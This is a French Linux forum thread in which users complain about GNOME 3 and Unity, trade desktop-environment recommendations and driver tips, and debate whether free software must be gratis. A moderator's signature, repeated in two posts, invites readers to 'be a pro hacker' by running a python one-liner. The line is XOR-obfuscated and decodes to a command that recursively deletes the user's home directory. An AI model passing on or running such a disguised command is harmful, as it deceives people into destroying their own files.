Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 25-11-2011 16:28:25

spawn
Modérateur

Gnome 3 c'est du ****

Bonjour !

Depuis quelque jours, gnome 3 arrive dans les mises à jour de Debian.
J'ai eu beau tenter de repousser la date du apt-get update, je l'ai fait.

C'est pourri !
Plus de 'panel' en haut, juste une barre noire que l'on ne peut pas changer.
On ne peut RIEN y ajouter.
Les paramètres sont ceux d'avant, il y a moins de menus qu'avant (donc certaines choses sont inchangeables).

Le bon vieux ALT+TAB permet de switcher entre les types de fenêtres.
Donc les terminaux vi,python,gcc, tous à la même enseigne.

On peut toujours bouger les fenêtres, mais l'optino 'disable mouse when typing' dure 3000ans.
On doit donc attendre 40000 ans après avoir tapé quelque chose pour pouvoir changer de terminal.

Le plus scandaleux restant le bureau, on ne peut RIEN y faire. Il est vide, avec un fond d'écran bizarre (il m'en a mis un ancien d'il y a trois semaines, mal cadré) et on peut s'amuser à rager en cliquant des deux boutons partout dessus, ça ne fait RIEN.

C'est donc super pour rager.

Vous allez me dire, 'oui, mais y'a le mode fallback avant de se loguer pour revenir à l'ancien thème'.
#FAUX!!!!!!!!!!!
C'est un mélange de vomi, d'ancien thème, d'un peu d'icônes sur le bureau et de chair d'orc en décomposition.

Et vous vous en pensez quoi ?  :)

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 25-11-2011 17:56:15

goliate
Membre Irremplaçable
Site Web

Re : Gnome 3 c'est du ****

pour ma part je suis tout a fait d’accord avec ton avis, il auraient dut laisser le choix entre l'ancienne et la nouvelle interface.
Enfin je suis entrain de voir pour changer de gestionnaire de bureau on verra bien se que je trouve.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#3 25-11-2011 21:33:58

spawn
Modérateur

Ah, on peut remettre ses anciennes icônes, et c'est super intuitif :
Faites ALT+F2, combinaison que vous utilisez depuis votre plus tendre enfance.
Tapez dconf-editor, programme que vous avez connu avant votre première petite amie.
Comme il n'est pas installé par défaut, installez le a grands coups de apt-get.
Faites ALT+F2.
Tapez dconf-editor avec rage, et pétez-lui le nez.
Allez chercher dans l'arborescence intuitive ici:
  org / gnome / desktop / background
  et cochez la case 'show-desktop-icons', non il n'y a pas de fichier de configuration unifié, faut pas déconner.
Ensuite, si vous ne voulez pas des icones en plus (genre la poubelle) allez ici:
  org / gnome / nautilus / desktop
  et chochez ce que vous voulez.

Pour finir, pleurez pour les 500+Km qui vous séparent de l'amour de votre vie, le hotspot sfr et le proxy de l'école qui vous empêchent d'installer directx sur votre nouveau pc pour jouer à Skyrim, ragez parce que Skyrim a été traduit par Bordeciel, et hurlez de rage quand vous voyez que votre belle debian wear that red dress tonight, allez sous windows parce qu'à défaut de pas être top, a ne change pas, éclatez des bots sur CSS et lisez le dernier Goncourt de la Nouvelle 'Concerto à la mémoire d'un ange' et allez hurler votre rage sur crack-wifi.com

Bref. J'ai fait une mise à jour.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 25-11-2011 21:42:35

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Plop les gars 2 solutions smile.

Linux Mint ou un autre environement (xfce, openbox etc etc) ... Tout comme vous Unity ou Gnome ben c'est un peu tout pourri smile.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#5 26-11-2011 18:12:29

goliate
Membre Irremplaçable
Site Web

noireaude a écrit :

Plop les gars 2 solutions smile.

Linux Mint ou un autre environement (xfce, openbox etc etc) ... Tout comme vous Unity ou Gnome ben c'est un peu tout pourri smile.

j'ai pas tout compris surtout "Tout comme vous Unity ou Gnome ben c'est un peu tout pourri smile", sinon c'est vrai que xfce je l'avais zapper car il et pas mal, linux mint korben en as parler mais j'ai pas encore eu l'occasion de tester.

En même temps madame viens tout juste de s’habituer a ubuntu,donc si je change sa va encore être la guerre ><.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#6 26-11-2011 19:56:40

noireaude
Membre d'honneur
Site Web

Je voulais dire par la que je n'accrochais pas trop à Gnome où Unity (qui est dans la même lignée).

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#7 27-11-2011 14:51:49

goliate
Membre Irremplaçable
Site Web

a oui désoler hier j'étais a l'ouest, de toute façon canonical va perdre des clients (si on peut dire sa)a cause d'unity, surtout que ubuntu étais devenue la referance de linux pour les débutant, mais depuis unity sa doit dire que je ne ne c'est plus qu'elle linux conseiller a un débutant.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#8 27-11-2011 16:18:57

koala
Membre d'honneur
Lieu : In the sky

Linux mint est pas mal je l'ai en essai sur le second pc en dual avec la 10.04.3 et j'ai pas de souci particulier, c'est fluide ça rame pas ça fait ce que l'on demande, pas de pépin a signaler perso je crois bien que je vais la garder.

#9 27-11-2011 18:11:39

noireaude
Membre d'honneur
Site Web

Mint est pas mal en effet ou au pire Xubuntu, j'aime bien les deux.

#10 28-11-2011 01:55:45

goliate
Membre Irremplaçable
Site Web

moi aussi j'aime xubuntu, d’ailleurs c'est la première distribution Linux que j'ai installer en dur.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#11 28-11-2011 11:33:12

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Mince alors, vous aussi vous xubuntuez... Et moi qui me croyait original... Bon, j'ai vu le dernier ubuntu avec Unity, un copain avait besoin d'un coup de main... Doux Jésus!
Quelle galère, quelle horreur!
On dirait le SO d'une imitation de i-phone made in Singapour... Et puis, ¡vamos! Le truc des "app" payantes bien en évidence, dans le centre de software, c'est la goute d'eau qui fait déborder le vase...
SOLIDARITY AGAINST UNITY
yeahanim

Dernière modification par kcdtv (28-11-2011 11:34:21)

#12 28-11-2011 18:07:13

noireaude
Membre d'honneur
Site Web

kcdtv a écrit :

Le truc des "app" payantes bien en évidence, dans le centre de software, c'est la goute d'eau qui fait déborder le vase...

La je ne suis pas trop d'accord, libre ne veut pas et n'a jamais voulu dire gratuit. Même si c'est souvent le cas. Je ne vois donc pas en quoi cela gène, qu'elles soient mises en avant ou non.

Il faut bien que le modèle libre trouve un terrain économique, certains vont vendre des applications, d'autres vendront du service ...

#13 29-11-2011 04:46:49

kcdtv
Membre d'honneur
Lieu : Internacionaluña

, libre ne veut pas et n'a jamais voulu dire gratuit

On en avait déjà discuté au détours d'un sujet..., et je suis d'accord avec toi sur ce point:
freeware ne doit pas se comprendre comme software gratuit mais comme software de code libre. Ce point est clair et n'est pas de l'ordre de l'opinion mais d'un fait sémantique/linguistique.

Il faut bien que le modèle libre trouve un terrain économique, certains vont vendre des applications, d'autres vendront du service

Et là on aborde un autre terrain que celui de la sémantique net c'est là où je ne suis pas d'accord avec toi
Je pense qu'au contraire, si le software libre veut gagner du terrain, vivre en tant que tel; il doit se baser sur d'autres valeurs que le merchandising en la relation producteur/consommateur, mais sur des notions comme communauté, partage des connaissance etc...
C'est même à mon avis une véritable boîte de Pandore.
Je trouve ça même inquiétant

#14 29-11-2011 18:25:03

noireaude
Membre d'honneur
Site Web

kcdtv a écrit :

Il faut bien que le modèle libre trouve un terrain économique, certains vont vendre des applications, d'autres vendront du service

Et là on aborde un autre terrain que celui de la sémantique net c'est là où je ne suis pas d'accord avec toi
Je pense qu'au contraire, si le software libre veut gagner du terrain, vivre en tant que tel; il doit se baser sur d'autres valeurs que le merchandising en la relation producteur/consommateur, mais sur des notions comme communauté, partage des connaissance etc...
C'est même à mon avis une véritable boîte de Pandore.
Je trouve ça même inquiétant

Ce n'est un boîte de pandore que si tu n'as pas connaissance des 4 libertés fondamentales du logiciel libre et cela m'agace toujours de voir les gens s'en étonner.

Les termes de la GPL autorisent toute personne à recevoir une copie d'un travail sous GPL. Chaque personne qui adhère aux termes et aux conditions de la GPL a la permission de modifier le travail, de l'étudier et de redistribuer le travail ou un travail dérivé. Cette personne peut toucher de l'argent pour ce service ou bien ne rien toucher. Ce dernier point distingue la GPL des autres licences de logiciels qui interdisent la redistribution dans un but commercial. Stallman pense que le logiciel libre ne devrait pas placer de restriction sur l'utilisation commerciale, et la GPL indique explicitement qu'un travail sous GPL peut-être (re)vendu. En cas de modification, le résultat doit être placé sous la même licence.

Source Wikipédia.

Ca parait quand même très clair et compréhensible.
Ce n'est de toute façon pas un problème de voir des applications publiées sous GPL payantes puisque de toute façon tout le monde peut avoir les sources et les compiler pour ses propres besoins.

Libre ne veut et n'a jamais voulu dire gratuit. Et ce, jusque dans (comme tu le dis) ses fondements sémantiques. La seule dérive inquiétante qu'il y a eu c'est que les gens on associé libre et gratuit depuis le début. Tu as précisé que le terme freeware a été remplacé car il entretenait cette confusion, c'est vrai. C'est bien la preuve que le logiciel libre avait la vocation de pouvoir se vendre, (c'est dailleurs les entreprises qui ont choisi le terme opensource, dans ce but la).

Pour finir avec ça, il ne faut pas être naïf. Si le logiciel libre à souvent été gratuit, c'est plus du au fait qu'il n'avait aucune chance de se vendre face à des concurrents déjà mieux placés, que pour des raisons purement philosophiques. Si Linus Torvalds avait eu une chance de faire fortune avec Linux à l'époque, tu peux être sûr et certain qu'il ne l'aurait JAMAIS publié sous licence GPL. Il n'en avait d'ailleurs pas l'intention initialement.

---------------

Ensuite tu dis "si il veut trouver sa place". Ok on peut penser à première vu qu'il na pas trouvé sa place si on ne se fie qu'au 90/95% de présence de Windows sur les pc. Mais c'est bien réducteur. C'est quoi trouver sa place pour le libre ?
Car moi je pense qu'il l'a trouvé depuis très longtemps déjà, contrairement à toi et à pas mal de gens.

Quelques exemples qui le prouvent.

- Même ceux qui n'ont jamais touché un pc utilisent Linux et des logiciels libres (sans le savoir) quand il se servent de terminaux équipés de systèmes embarqués, téléphones télés etc etc ... 

-Même ceux qui n'utilisent que Windows ou Mac utilisent Linux (sans le savoir).
Les premiers quand ils surfent (modems et serveurs sur le web) et les seconds quand il surfent et quand ils utilisent leur pc ou téléphones qui sont à la base des "Unix".

-Sans parler de ceux qui utilisent des lgiciels tels que Fifrefox, Thunderbird ou VLC sans savoir que c'est du libre, sans parler d'Android, sans parler du calcul partagé, sans parler de pays ou d'administrations qui sont passés sur du libre ces derniers temps, etc etc ....

Linux et le libre sont présents absolument partout.

Alors même si il n'est pas la où c'est le plus visible et même si les motivations ne sont toujours pas les bonnes. On ne peut pas dire que le libre n'a pas trouvé sa place si on tient compte de tout ça. Trouver un modèle économique n'est donc pas une dérive inquiétante mais une suite logique.

Comme d'hab il faut voir les chose telles qu'elles sont et non telles qu'on les voit.

La où il faut faire très attention et où il faut se battre en revanche. C'est quand une application ou un code libre sont agrémentés d'une surccouche ou tartinée d'API qui ne le sont pas. Ex, Android, Mono etc etc.. Pour moi le gros danger vient de ces pratiques en ce moment.

On voit bien qu'on commence à perdre le contrôle de nos Smartphones et de nos tablettes, petit à petit, à cause de ces surccouches.

#15 29-11-2011 21:05:38

spawn
Modérateur

Bon, en fait, pour arrêter de troller, je vais vous révéler des arcanes obscures dénichées dans un vieux grimoire qui traite de gnome 3 :
On peut presque tout modifier (par contre, ce n'est PAS DU TOUT intuitif) avec :

dconf-editor
gconf-editor
et gsettings

(et en plus gnome tweak qui est non officiel que je n'ai pas essayé.)
3
Et il y a bien des fichiers xml unifiés à modifier (par contre, une fois sur deux on a un message d'erreur en faisait ALT+F2 et 'r' (pour relancer gnome manifestement)
Par ici :
/usr/share/je_sais_plus_c'est_bete/settings-a-peu-pres-gnome-3.xml

C'est super relou que le ALT+TAB fasse n'importe quoi pour coder.
Je vous dis si j'arrive à remettre ça comme il faut.

(pour ceux qui se demandent, non, je n'ai aps le choix de mon DE sur mon PC pro.)

@9b0ae3c4 méric.fr

#16 11-12-2011 17:17:05

koala
Membre d'honneur
Lieu : In the sky

Hey wink

Bon quelque précisions pour ceux qui souhaiterai utiliser linux mint 12 lisa avec une carte graphique ATI radeon dans la série des 4000.Marre de la tester en live usb je l'ai mis en dur et la les soucis sont arrivés.

Primo, ne pas installer les driver propriétaires que mint propose, d'une part car ils ne s'installeront pas comme ça (erreur /var/jokey/log ou un truc dans le genre) pour les installer faut d'abord purger fxglr et le remettre et ça ne marche toujours pas donc on va passer en mode vesa dans le grub on retente l'installe eh la oh miracle ça marche, oui mais problème de freeze intempestif hmm On supprime donc les drivers de mint pour aller chercher ce de catalyst chez ATI l'installe ce passe bien mais fausse joie car impossible de lire un film ou une vidéo qui saute sans arrêt.

Enfin après avoir tout cassé je me suis demander si laisser mon ATI tel quel ne valait pas mieux, et devninez quoi c'est ce qui fallait faire lol

Donc si vous avez une carte graphique ati 4000 series ne faites surtout rien et tout marchera (film, vidéo, jeux...)

Voila, j'ai préférer le dire comme ça si d'autre ont la meme config matériel ils savent a quoi s'attendre wink

Ps: il semble qu'ils aient améliorer la portabilité du wifi comparé aux autres linux.

#17 12-12-2011 00:06:21

noireaude
Membre d'honneur
Site Web

koala a écrit :

Donc si vous avez une carte graphique ati 4000 series ne faites surtout rien et tout marchera (film, vidéo, jeux...)

Exact, depuis l'apparition du pilote libre "nouveau" j'ai remarqué que globalement les drivers proprios n'étaient plus nécéssaire voir bancales smile

#18 12-12-2011 14:54:24

antares145
Membre d'honneur
Site Web

Le driver "nouveau" concerne les carte nVidia, pas ATI wink

C'est vrai que les pilotes ouverts/communautaires deviennent excellents, mais pour moi Nouveau n'est pas encore assez bon, surtout en ce qui concerne l'OpenGL et l'accélération matérielle 3D. C'est vrai que quand on en a pas l'usage on s'en fout un peu, mais par facilité je reste sur le pilote officiel (fermé) : je me méfie d'une éventuelle mise-à-jour foireuse sur le pilote ouvert qui me laissera sans serveur X (on a tous besoin de sa dose de X !).

J'admets que ça dépend aussi de la qualité des paquets fournis par la distribution, et je reconnais aussi que c'est un réflexe que j'ai acquis du temps où j'étais sur Ubuntu troll.gif

#19 12-12-2011 20:01:31

noireaude
Membre d'honneur
Site Web

Ok merci Antares je pensais que "Nouveau" était un pilote générique. Je n'ai pas de carte ATI. Pour le reste je suis assez d'accord avec si tu veux profiter de l'accélération matériel "Nouveau" ne suffit pas. Pour un usage commun en revanche il suffit amplement.

Pour les mises à jour c'est vrai qu'il faut rester méfiant, mais avec le pilote fermé je me suis déjà fait avoir plusieurs fois, genre tout va bien, tu lances une vidéo et t'as Victor Wooten en violet lol. En général je reviens à la version plus ancienne pour régler le souci.

#20 18-06-2013 14:27:00

Anoname
Membre Radioactif
Lieu : AnoNation

Désolé de déterrer ce sujet mais je vous partage mon point de vu :

1 - KDE = Super ! & Pratique

2 - XFCE = Super ! & Pratique

3 - LXDE = Super ! & Pratique

4 - GNOME = Esthétique moyen, si on s'habitue ça peut être pratique.

5 - MATE = Esthétique moyen, si on s'habitue ça peut être pratique.

6 - E17 = Esthétique convenable, on peut avec le temps s'habituer.

7 - GNOME 3 = Esthétique nul & Jamais pratique

8 - Unity = Esthétique pas mal (qui prend tout le CPU) ! & Jamais pratique, mais pour les tablettes et les portables, ok.

9 - OpenBox = Graphiquement, une horreur qui peut avec le temps s'avérer pratique.

Les autres = Je ne les aient pas testés neutral

Dernière modification par Anoname (18-06-2013 14:27:32)

668999bannerfinal.jpg

Annonce